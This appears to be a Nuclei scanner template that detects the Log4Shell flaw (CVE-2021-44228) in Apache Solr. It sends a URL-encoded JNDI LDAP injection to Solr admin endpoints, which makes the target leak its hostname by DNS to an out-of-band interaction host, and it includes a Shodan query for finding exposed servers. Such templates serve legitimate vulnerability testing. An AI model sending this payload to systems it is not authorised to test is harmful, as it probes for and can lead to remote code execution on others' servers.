id: apache-solr-log4j-rce

info:
  name: Apache Solr 7+ - Remote Code Execution (Apache Log4j)
  author: Evan Rubinstein,nvn1729,j4vaovo
  severity: critical
  description: |
    Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+.
  reference:
    - https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228
    - https://twitter.com/sirifu4k1/status/1470011568834424837
    - https://github.com/apache/solr/pull/454
    - https://logging.apache.org/log4j/2.x/security.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
    - https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2021-44228
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2021-44228
    cwe-id: CWE-77
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"Apache Solr"
  tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev
variables:
  rand1: '{{rand_int(111, 999)}}'
  rand2: '{{rand_int(111, 999)}}'

http:
  - raw:
      - |
        @timeout: 25s
        GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-{{rand1}}%7D%24%7B%3A-{{rand2}}}%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1
        Host: {{Hostname}}

    payloads:
      endpoint:
        - "collections"
        - "cores"
    attack: clusterbomb

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'org.apache.solr'

      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

    extractors:
      - type: kval
        kval:
          - interactsh_ip # Print remote interaction IP in output

      - type: regex
        group: 2
        regex:
          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
        part: interactsh_request

      - type: regex
        group: 1
        regex:
          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
        part: interactsh_request

# digest: 4a0a00473045022100dcda466dedb25c8b1fcca8ea6a7f103fb6ecec451d2caea1930e309e034a411b022003971cb0b9bc8a576cf364cb32d6245ca9ab3faaf63c2a5d6f3219d40ef81c76:922c64590222798bb761d5b6d8e72950
